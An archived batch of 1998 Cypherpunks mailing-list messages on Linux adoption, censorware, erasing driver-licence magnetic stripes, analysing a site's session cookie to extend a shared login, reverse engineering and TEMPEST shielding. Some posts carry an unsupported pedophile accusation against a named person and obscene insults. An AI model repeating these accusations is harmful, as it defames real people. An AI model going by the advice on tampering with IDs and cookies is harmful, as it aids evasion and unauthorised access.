ln6yR9IE6rX3b3GCvPSQ5uPhXWrd2kWaZvG4rQ4Oj1m3yTrFaPRqCBPvtCRBbGFu
IFR1IDwxMDI1MzQuMjE2NUBjb21wdXNlcnZlLmNvbT6JAJUDBRAzyUJWl7OYGuXZ
FeEBAc4TBACT8gLtyE0C8NBGs9aDa9kHfeNzN8VbNfUpoOiWi4duAAZFiAt/e+ji
J2BUMLIY8kzm2WX4mVzpKYjvea5TtHeQgbESV1HVZ5k7abENMUYz5nSMloOE+bb+
XRzgGgFF3htGXDJNywlLNgoYi5vTMT0pbGlCzOu215Cc4mFls2w1iA==
=CM85
-----END PGP PUBLIC KEY BLOCK-----
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 05:34:49 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: GNU market penetration... (fwd)
Message-ID: <199802082136.PAA16474@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: GNU market penetration...
> Date: Sun, 8 Feb 1998 14:43:51 -0600 (CST)
> From: ichudov@algebra.com (Igor Chudov @ home)

> Jim Choate wrote:
> > I have a question, after going to the GNU homepage (www.gnu.org) I have not
> > been able to find out the numbers of how many if any corporate subscribers
> > and participants to the GNU Foundation. Is there anyone out there who might
> > have a pointer to this information, or better yet is an actual participant
> > in the GNU heirarchy and can discuss these and related issues?
> 
> The number of subscribers bears almost no relation to the number of users.

Here is what I am thinking...

 -  commercial success at larger commercial enterprises can be seen
    by looking at their gross orders of software. Consider that if a
    company decides they want to use Win95 and WinNT for their systems.
    Are they going to buy them one at a time? No, they are going to
    purchase either large quantities or site licenses.

 -  Since GPL doesn't really support site licenses in the normal sense
    they won't be there to look at. In other words the total number of
    site licenses from corporations for software is a measure of its
    penetration.

 -  Since GPL doesn't prohibit buying one copy and then making as many
    subsequent copies as you desire it is not likely that a given company
    is going to buy great quantities of GPL'ed software. What they'll do
    is have each department, through their own budget disbursement and
    orders, purchase such software as required. So we can expect to see
    one or more, but relatively few overall, purchases of software.
    Since this does not seem, to me anyway, to allow for a differentiation
    between one hacker purchasing the software in a comany or an entire
    department this also will not be a clear indication of penetration.

 -  Large companies faced with the above situations and having committed
    to the continued survival of those sources of software will want to
    create a situation where they minimize their need to keep re-ordering
    software as its needed (expensive in people and process time) the
    reasonable thing is to subscribe for annual terms or similar programs.

What I would like to know is what is the percentage of subscriptions by
companies in regards to the total number of subscriptions of GNU software.
I couldn't find any way to get this info on the www.gnu.org page. Since the
question is at what point is current penetration of Linux into commercial
entities as a standard business environment this seemed relevant.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 9 Feb 1998 05:02:10 +0800
To: cypherpunks@toad.com
Subject: Re:  Guy Polis is a pedophile
Message-ID: <199802082051.PAA28824@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Heh-heh-heh: it's so funny so see how high Dimitry jumps
when he sees people being made aware of his body of work.

>   From: dlv@bwalk.dm.com
>   
>   I have perfected sucking my own cock! Call me for a video!

Oh, Dimitry, we already know you are in love with yourself.
---guy

   And what a pathetic Net researcher... ;-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Feb 1998 05:53:37 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks share cookies
Message-ID: <1mPLke4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



I've updated the cookie-sharing page at:

http://www.geocities.com/CapeCanaveral/Hangar/6354/cookies.html

Please share your cookies!


I'm having a bit of a problem with the cookie from Firefly.com and other
sites that use their passport software (parts of barnes&noble, quitnet.org,
mylaunch.com, filmfinder.com, etc).

After a log in (as cypherpunks:cypherpunks, naturally), the server sends a
FIREFLYTICKETV3 cookie which appears to contain the username and
a timestamp.  After about 24 hours the cookie expires and one has to log
in again.  If someone can set the expiration date far in the future,
I'll add the cookie to the shared cookie list; otherwise they're useless.

Here's a sequence of "firefly ticket" cookies over a few days:

FIREFLYTICKETV3=WWKKILVVLLXVbVHKOHSNMH_\SVIHHHEGIIWRWUFIJI
                WWKKILVVLLXVbVHKOHSNMH_\SVGHJHLGMISRUUNIGI
                WWKKILVVLLXVbVHKOHTNFHa\WVHHGHKGFISRYUOILI
                WWKKILVVLLXVbVHKOHTNFHa\WVHHHHEGOIVR[UKIII
                WWKKILVVLLXVbVHKOHTNFHa\WVHHHHFGIIXRZUKIOI
                WWKKILVVLLXVbVHKOHTNFHa\WVHHGHKGFISRYUOILI
                WWKKILVVLLXVbVHKOHTNFHa\WVHHHHEGOIVR[UKIII
                WWKKILVVLLXVbVHKOHTNFHa\WVHHHHFGIIXRZUKIOI
                WWKKILVVLLXVbVHKOHTNFHa\WVJHGHEGJITRUUNIMI
                WWKKILVVLLXVbVHKOHTNFHa\XVEHLHJGKIXRRUNIHI
                WWKKILVVLLXVbVHKOHTNFHa\XVEHLHKGJIVRUUKIMI
                                     ^^^^^^     **********

The expiration is triggered by the piece I marked ^^^.  Munging the end
of the cookie (marked ***) doesn't seem to invalidate the cookie.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Igor Chudov @ home" <ichudov@www.video-collage.com>
Date: Mon, 9 Feb 1998 07:09:58 +0800
To: declan@well.com
Subject: Re: rec.guns et.al. blocked by censorware
In-Reply-To: <6bla0o$4ad@xring.cs.umd.edu>
Message-ID: <199802082302.RAA18137@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text/plain



In rec.guns, Dan <ywq@wco.com> wrote:
* I guess I should not be surprised but blocking software Cyber Patrol apparently
* blocks rec.guns and rec.hunting because we are militant extremists, advocate
* violence and swear.   The whole story starts at:
* http://www.spectacle.org/cwp/index.html
* You have to keep going until you get to newsgroups.
* 
* If Cyber Patrol is doing this I suspect their competition is doing so as well.
* 
* Magnum:   I know this is sort of off topic, but I believe it's important for the
* group at large to know.


Just fyi, I did look at the site and was astonished. Indeed anyone who uses
this Cyber Patrol is a fool.

Examples of HUNDREDS of blocked newsgroups:

rec.games.mecha Giant robot games. (Moderated) Quest/Illegal/Gamble Violence/Profanity Intol
news.groups             Discussions and lists of newsgroups. Intol
news.groups.questions   Where can I find talk about topic X? Intol
rec.guns Discussions about firearms. (Moderated) Militant/Extreme Violence/Profanity


* -- 
* Dan - ywq@wco.com
* I love the smell of Hoppes #9 in the morning.
* Follow the Money - Who funds the election of your Congresscritter - www.opensecrets.org
----------------------------------------------------------------------------
char*p="char*p=%c%s%c;main(){printf(p,34,p,34);}";main(){printf(p,34,p,34);}

                \=/,         _-===-_-====-_-===-_-==========-_-====-_
                |  @___oo   (                                        )_
      /\  /\   / (___,,,}_--=                                          )
     ) /^\) ^\/ _)        =__       Anything is good and useful if    )
     )   /^\/   _)          (_                                        )
     )   _ /  / _)            (         it's made of chocolate.        )
 /\  )/\/ ||  | )_)            (_                                     )
<  >      |(,,) )__)             (   http://www.algebra.com/~ichudov   )
 ||      /    \)___)\             (_                                  _)
 | \____(      )___) )___           -==-_____-=====-_____-=====-___==
  \______(_______;;; __;;;





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Mon, 9 Feb 1998 08:05:33 +0800
To: cypherpunks <cypherpunks@sirius.infonex.com>
Subject: re: Driver Licenses
Message-ID: <34DE37BF.E4E6A424@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger III wrote:
>My question is what is the best way to remove this information from the

>cards?
>
>A few passes over a strong magnet sufficient or should a chemical
solvent
>be used?

Either should work...I'll bet that scratching the shit off with his keys
worked too ;)
I'll have to remember that when it's time to get mine done.

That was a good question, though, does anyone know how much data those
little stripes can hold?

Scott R. Brower
http://www.infowar.com
http://www.efflorida.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 08:08:04 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: re: Driver Licenses (fwd)
Message-ID: <199802090012.SAA17348@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 08 Feb 1998 17:54:56 -0500
> From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
> Subject: re: Driver Licenses

> William H. Geiger III wrote:
> >My question is what is the best way to remove this information from the
> 
> >cards?
> >
> >A few passes over a strong magnet sufficient or should a chemical
> solvent
> >be used?
> 
> Either should work...I'll bet that scratching the shit off with his keys
> worked too ;)
> I'll have to remember that when it's time to get mine done.

My suggestion is not to alter the card such that a visual inspection would
show. In most states it's a felony to modify or alter a drivers license,
they are considered the property of the state and not yours personaly.

Next time a cop asks for ID and you hand him your d.l. you could be in for a
lot more than  couple hundred dollars and a ticket.

> That was a good question, though, does anyone know how much data those
> little stripes can hold?

Anywhere from a few hundred bytes to a k. Depends on the bit density of the
tape. Go down to your local electronics or audio supply and get a polarized
loupe and count them.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Feb 1998 08:12:26 +0800
To: cypherpunks@toad.com
Subject: Re: rec.guns et.al. blocked by censorware
In-Reply-To: <v03102801b103ed5a2019@[207.167.93.63]>
Message-ID: <w2wLke6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> That the "cyber nannies" are blocking [rec.guns] (and other similarly nonsexual,
> nonprofane newsgroups) is exactly what was expected. These cyber nannies
> become tools for political correctness.

Steve Boursy reports that another censorware vendor has been caught mailbombing
a critic (sent her >400 junk e-mails) in retaliation for her criticism.

Guy Polis is a pedophile.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <remailer@htp.org>
Date: Mon, 9 Feb 1998 03:49:42 +0800
To: cypherpunks@cyberpass.net
Subject: Driver Licenses
Message-ID: <19980208194501.10692.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain



Recently had to renew my DL here in Florida. While we are not forced to give up our fingerprints (yet)we have a new little magnetic strip similar to those on a credit card or ATM card and I can see this as a way for the State to start holding more and more data about us on these I.D.'s (like fingerprints, criminal records, etc...  Coincidentally, that day when I went into my grocery store to get a six pack of brew, I got carded.  I handed my new little card over and the teller and rather than looking at my date of birth she started to swipe the damn thing through her credit card reader machine!  I stopped her, grabbed my DL back and told her to manually enter the date as they have always done.  When she explained that it is against store policy and that she 'had' to swipe any IDs that had the strip I got my keys outta my pocket and all but removed the strip from the back of my little nemesis. Handed it back to her and told her to swipe away; it is against MY policy to provide !
!
!
the store with my address. I don't want any damn pepsi coupons mailed to me each time I buy coke, or northern tissue coupons when I buy charmin. Nor do I want the store collecting information on how much beer I buy.

Sure, I want my alchohol purchases going to the Dept of Motor Vehicles and the other State departments...like hell.

My question is, how much information can be stored on these strips?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Mon, 9 Feb 1998 10:58:39 +0800
To: cypherpunks <cypherpunks@sirius.infonex.com>
Subject: re: Drivers Licenses
Message-ID: <34DE5F9A.9744B0D7@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain



>In most states it's a felony to modify or alter a drivers license,
>they are considered the property of the state and not yours personaly.
>
>Next time a cop asks for ID and you hand him your d.l. you could be in
for a
>lot more than  couple hundred dollars and a ticket.

That's silly! I mess up my credit card strips all the time by keeping
them in my pocket with keys on motorcycle rides, or in my tool belt when
I used to do carpentry, or even slipping them into my money clip the
wrong side out....the tape has never lasted longer than a month on any
of my cards...I doubt, seriously, that a cop will harrass anyone who
does not come out and say, "Yes, officer, I intentionally defaced my
DL.  And ya know why, Mr. Poleesse Man? Well, I'll tell ya <yadda,
yadda, yadda, privacy, yadda, yadda, biometrics, yadda....>"

I do agree that it is proably better to do the damage without it being
noticable.  Less suspicion is ALWAYS better.

Best,
-S





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 11:02:57 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: re: Drivers Licenses (fwd)
Message-ID: <199802090304.VAA17982@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 08 Feb 1998 20:44:58 -0500
> From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
> Subject: re: Drivers Licenses

> That's silly! I mess up my credit card strips all the time by keeping
> them in my pocket with keys on motorcycle rides, or in my tool belt when
> I used to do carpentry, or even slipping them into my money clip the
> wrong side out....the tape has never lasted longer than a month on any
> of my cards...I doubt, seriously, that a cop will harrass anyone who
> does not come out and say, "Yes, officer, I intentionally defaced my
> DL.  And ya know why, Mr. Poleesse Man? Well, I'll tell ya <yadda,
> yadda, yadda, privacy, yadda, yadda, biometrics, yadda....>"
> 
> I do agree that it is proably better to do the damage without it being
> noticable.  Less suspicion is ALWAYS better.

Well I just looked at my Tx. d.l. to make shure my memory was correct. At
least on Texas d.l's the *only* way to get to the mag stripe is to break the
clear plastic laminating cover. And I assure you that if that cover is
broken or tampered with the officer will become much more suspicous. It has
this nifty little seal embossed all over the laminating cover on both sides.
So going down to the local laminating shop won't work either.

Proceed at your own risk, it's your neck after all.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 9 Feb 1998 11:38:33 +0800
To: Jim Choate <ravage@ssz.com>
Subject: re: Drivers Licenses (fwd)
In-Reply-To: <199802090304.VAA17982@einstein.ssz.com>
Message-ID: <199802090401.XAA04008@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199802090304.VAA17982@einstein.ssz.com>, on 02/08/98 
   at 09:04 PM, Jim Choate <ravage@ssz.com> said:


>Forwarded message:

>> Date: Sun, 08 Feb 1998 20:44:58 -0500
>> From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
>> Subject: re: Drivers Licenses

>> That's silly! I mess up my credit card strips all the time by keeping
>> them in my pocket with keys on motorcycle rides, or in my tool belt when
>> I used to do carpentry, or even slipping them into my money clip the
>> wrong side out....the tape has never lasted longer than a month on any
>> of my cards...I doubt, seriously, that a cop will harrass anyone who
>> does not come out and say, "Yes, officer, I intentionally defaced my
>> DL.  And ya know why, Mr. Poleesse Man? Well, I'll tell ya <yadda,
>> yadda, yadda, privacy, yadda, yadda, biometrics, yadda....>"
>> 
>> I do agree that it is proably better to do the damage without it being
>> noticable.  Less suspicion is ALWAYS better.

>Well I just looked at my Tx. d.l. to make shure my memory was correct. At
>least on Texas d.l's the *only* way to get to the mag stripe is to break
>the clear plastic laminating cover. And I assure you that if that cover
>is broken or tampered with the officer will become much more suspicous.
>It has this nifty little seal embossed all over the laminating cover on
>both sides. So going down to the local laminating shop won't work either.

>Proceed at your own risk, it's your neck after all.

A couple of times through the washer and dryer and that lamination
seperates. Any cop that has worked traffic has seen plenty of DL's in this
shape (heh should have seen my old DL when I truned it in to get it
renewed <g>).

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Your brain.  Windows: Your brain on drugs.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNN5ry49Co1n+aLhhAQFm/wQAhFcm2qIuqA6n1GgkxIgclGPw89cOI7UU
NETVYGK6DEf4zM6/pUyJ3VgjMcq7JZnrV3t6q8iM3p+g0htZqzX7tzWeab7SLyuL
meoL8IWLGIwR9RpMz7equHQIJ/O/M6zuP02y+wOHxdZsDBfglW8/0KQvrU0ZD74E
hlDJTFFNoSk=
=xV9x
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 9 Feb 1998 04:46:23 +0800
To: cypherpunks@cyberpass.net
Subject: Driver Licenses
In-Reply-To: <19980208194501.10692.qmail@nsm.htp.org>
Message-ID: <199802082039.VAA10619@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Coincidentally, that day when I went into my grocery store to get a six
> pack of brew, I got carded.  I handed my new little card over and the
> teller and rather than looking at my date of birth she started to swipe
> the damn thing through her credit card reader machine! 
> I stopped her, grabbed my DL back and told her to manually enter the date
> as they have always done.  When she explained that it is against store
> policy and that she 'had' to swipe any IDs that had the strip I got my
> keys outta my pocket and all but removed the strip from the back of my
> little nemesis. Handed it back to her and told her to swipe away; it is
> against MY policy to provide the store with my address. I don't want any
> damn pepsi coupons mailed to me each time I buy coke, or northern tissue
> coupons when I buy charmin. Nor do I want the store collecting
> information on how much beer I buy.

Odd.  When I first got a card with the stripe, I was a little paranoid so
I took a bar magnet and erased it.  Actually, I don't know whether my
eraser worked because nobody has ever asked to swipe my card thru a
reader.  I got a wallet with a plastic fold-out so if someone asks to see
my id, I open my wallet and show it to them, then put it away.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 11:39:10 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: re: Driver Licenses (fwd)
Message-ID: <199802090341.VAA18175@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 9 Feb 1998 04:22:54 +0100 (MET)
> Subject: Re: re: Driver Licenses (fwd)
> From: nobody@REPLAY.COM (Anonymous)

> "Yeah, officer, I dropped my ID in the street and it got run over.  Don't
> give me such a hard time about it, I'm just glad I got it back..."
> I really doubt you are going to get convicted for accidently dropping your
> wallet because your ID got scraped up a little bit on the back side.

See a previous post I submitted earlier in this regards...

> Seriously, the best way is a strong magnet.  You can also put it in your
> shirt pocket and iron it, then apply a strong magnet.  The heat will make
> it lose its magnetism more quickly; just make shure you don't melt it. :)

The 'Currie Point' (the point a magnetic material looses its magnetic
behaviour) for Iron Oxide is 600F so I rather doubt your home clothing iron
will significantly effect it. The plastic that the license is made of will
melt at about 250 - 300.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 11:51:48 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: re: Drivers Licenses (fwd)
Message-ID: <199802090355.VAA18303@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "William H. Geiger III" <whgiii@invweb.net>
> Date: Sun, 08 Feb 98 21:25:30 -0500
> Subject: re: Drivers Licenses (fwd)

> A couple of times through the washer and dryer and that lamination
> seperates. Any cop that has worked traffic has seen plenty of DL's in this
> shape (heh should have seen my old DL when I truned it in to get it
> renewed <g>).

I rather doubt that. I have had a Texas drivers license since I was 16, I'm
now 38. I have washed them innumerable times and I have never had the
lamination break or otherwise degrade. The lamination is quite heavy. I did
have one crack at the seam one time because of a bad lamination and was
specificaly instructed by the officer who wrote me a speeding ticket to get
it replaced. I did so immediately. The law here is that if the license is
damaged, you move, or otherwise make the information invalid you have 30
days to correct it. I suspect quite strongly that had I shown up at the court
house to pay that ticket with the same damaged license (required to be shown
at the time of payment) they would not have accepted the payment and might
have asked to to discuss the situation with one of the officers they so
thoughtfuly have placed about the room.

Texas takes counterfeiting of licenses quite seriously.

My suggestion would be don't try such juvenile tricks here, the DPS have
seen it before and won't be pleasant people to deal with unless you're
a juvenile.

I have a proposal. Lucky is supposed to be in Austin for the CFP conference.
If he is agreeable, he could ask to examine a Tx. d.l. We could leave it up
to his opinion as to whether these would be easy to alter.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 9 Feb 1998 05:08:09 +0800
To: cypherpunks@cyberpass.net
Subject: Software Reverse Engineering
Message-ID: <199802082100.WAA13567@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi All -

I've recently been disassembling some software written by idiots who never
heard of operating systems other than messy-windows, so that I can
re-implement it on my favorite platform (and fix numerous bugs).
I know many of you have done work in this area so maybe you can give me a
few tips.

I ran the program and traced its execution, which quickly showed what parts
were significant, and it's pretty easy to figure out what the relevant
functions are and what they do.  I was able to recompile sections of the
code into my own program and make it work without too much difficulty.

What is bugging me is this:  The program contains huge amounts of 'junk 
code' such as the following (disassembled with gdb):

     movl   0x7c58c,%eax
     movl   %eax,0xffffffa8(%ebp)
     movl   0xffffffa8(%ebp),%eax
     movl   %eax,0x7c590
     movl   0x7c590,%eax
     movl   %eax,0xffffffa8(%ebp)
     movl   0xffffffa8(%ebp),%edx

This segment of code accomplishes nothing execpt to move the same value
around into different locations, which are never again read.  At least
half of the instructions consist of similiar garbage, writing data into
locations that are never read, duplicating constants, copying values that
are never used, and so on.  The only thing saving the program from
running out of memory is that the programmer mostly used static buffers,
only sparingly doing dynamic allocation.  I'm quite surprised that I
haven't found any buffer overruns or security holes yet.

So, does anyone have reccomendations of what is the best way to seperate
the wheat from the chaff, so to speak?  I can use the program as is, but
the sheer amount of junk tends to make it run slowly, so I'd much prefer
to completely rewrite it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 9 Feb 1998 14:25:40 +0800
To: Ryan Lackey <jya@pipeline.com>
Subject: Re: Soft Tempest
In-Reply-To: <tw7k9b5uzhy.fsf@the-great-machine.mit.edu>
Message-ID: <v03102800b1044ad31629@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:19 PM -0800 2/8/98, Ryan Lackey wrote:

>I'm a bit busy until at least after FC '98, or I'd do it myself.  One
>of my goals is to keep my laptop as secure as possible, and that's
>an application where TEMPEST shielding is rather prohibitive.

Really? You think so? You think TEMPEST treatment of laptops is more
expensive than of normal machines?

The physics suggests just the opposite: the RF emissions from laptops are
expected to be lower from first principles, and, I have heard, are
measurably much lower. (I say "have heard" because I don't have any access
to RF measurement equipment...I once spent many hours a day working inside
a Faraday cage, but that was many years ago.)

The first principles part is that the deflection yokes in a CRT are the
largest radiated component of what got named "van Eck radiation." (I'd just
call it RF, but whatever.)

Laptops are missing this component. (It might be interesting to see the
radiated RF numbers for various kinds of flat panel displays.)

The emission from the keyboard would have to be looked at, of course.

Also, laptops, being so small, are easy to shield with mesh bags. An
inelegant approach would be to bend copper sheeting to form an enclosure. A
more elegant approach might be to take one of the tight-fitting laptop
cases (like the Silicon Sports "Wetsuit") and use it as a pattern for a
case made of conductive mesh fabric...or even something like aluminum
screen. Several layers would be even better.

But before going this route, I'd want to see some measurements. Laptops
might already be "quiet enough." (Measurements are needed to determine the
effectiveness of any proposed RF shielding anyway, so....)

Finally, for a number of years there have been proposals for viewing
screens built into glasses or goggles. "Crystal Eyes" was one of them.
Another was a replacement for standard EGA screens (this was 4-6 years
ago). These were being announced during the period when virtual reality
(VR) was expected to dominate...that hasn't happened, yet.

With some of these glasses, gargoyle-style, one could completely encase the
laptop in a shielded case (like a Zero Haliburton) and then use a palm
keypad...

Speaking of this sort of approach, a lower-tech version might be to use a
palmtop, like the HP 95LX, as a remote terminal to a machine completely
shielded. (The laptop could be in a shielded enclosure, or backpack, with
the 95LX snaked to it with cables.) Given the battery operation, the long
battery life (which says radiated RF is likely to be under control), the
LCD display, etc., this should be pretty good against eavesdroppers.

I haven't yet looked at the Ross Anderson paper, but some things bother me
about it. It seems unlikely that a "TEMPEST font" will affect keyboard and
main CPU board noise. Also, in a multiple window environment, with several
active windows, and with the target window being of varying sizes, I'm not
quite sure I buy the idea that a remote sensing of the content of one
window is very easy to pull off.

But I'll take a look at what Ross has to say.

--Tim May





Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Mon, 9 Feb 1998 07:24:29 +0800
To: cypherpunks@Algebra.COM
Subject: Zero Knowledge Access
Message-ID: <75567b97663d45b018853166ea965a73@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain



Dumbfuck Rimjob (Dr.) Dimitri Vulis fucks apes with a spiked metal 
pole on the weekends and dreams of someone doing it to him.

Buttfuck on, Dimitri.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Mon, 9 Feb 1998 13:07:47 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <ac25297f5d97f55fb62fca290eeac01f@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



>Odd.  When I first got a card with the stripe, I was a little paranoid so
>I took a bar magnet and erased it.  Actually, I don't know whether my
>eraser worked because nobody has ever asked to swipe my card thru a
>reader.  I got a wallet with a plastic fold-out so if someone asks to see
>my id, I open my wallet and show it to them, then put it away.

How many of us have done this? I nuked mine in the parking lot of the DMV.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 9 Feb 1998 13:29:38 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Soft Tempest
Message-ID: <tw7k9b5uzhy.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Anyone interested in working on this for linux?  It should be fairly
trivial to modify the linux console drivers, disk driver, and possibly
keyboard driver to take these changes into account.  At the same time,
it might be nice to add the permanence counters for RAM and magnetic
media.

I'm a bit busy until at least after FC '98, or I'd do it myself.  One
of my goals is to keep my laptop as secure as possible, and that's
an application where TEMPEST shielding is rather prohibitive.
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
